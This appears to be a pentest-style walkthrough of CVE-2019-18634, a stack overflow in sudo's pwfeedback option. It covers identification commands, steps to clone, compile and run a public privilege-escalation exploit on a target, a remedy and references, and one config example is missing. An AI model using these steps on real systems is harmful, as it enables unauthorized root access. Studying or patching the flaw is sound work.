In Sudo before 1.8.26, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process

Sudo's pwfeedback option can be used to provide visual feedback when the user is inputting their password. For each key press, an asterisk is printed. This option was added in response to user confusion over how the standard Password: prompt disables the echoing of key presses.

While pwfeedback is not enabled by default in the upstream version of sudo, some systems, such as Linux Mint and Elementary OS, do enable it in their default sudoers files.

Due to a bug, when the pwfeedback option is enabled in the sudoers file, a user may be able to trigger a stack-based buffer overflow. This bug can be triggered even by users not listed in the sudoers file. There is no impact unless pwfeedback has been enabled.

Inside the /etc/sudoers file ipwfeedback is specified like this:

The following sudoers configuration is vulnerable:

Affected Version

Sudo before 1.8.26

Identification

1. Print the version of sudo

  • sudo --version

2. Test if the asterisks appear on screen, by using any command with sudo

  • sudo whoami

2. Check sudo permissions for the current user

  • sudo -l

Exploitation (Script)

1. Knowing the application is vulnerable and has pwfeedback enabled in /etc/sudoers configuration. We can execute the following script written in C (https://github.com/saleemrashid/sudo-cve-2019-18634)

  • git clone https://github.com/saleemrashid/sudo-cve-2019-18634.git

2. Now proceed to compile the source code

  • cd sudo-cve-2019-18634
  • gcc exploit.c -o exploit
  • ls -l exploit

3. Transfer the file into the target machine

4. Execute the exploit

  • ./exploit
  • Whoami

Remedy

Upgrade SUDO software to 1.8.27 or later

Reference

https://github.com/saleemrashid/sudo-cve-2019-18634

https://nvd.nist.gov/vuln/detail/CVE-2019-18634

https://github.com/Plazmaz/CVE-2019-18634

https://www.exploit-db.com/exploits/47995

https://www.exploit-db.com/exploits/48052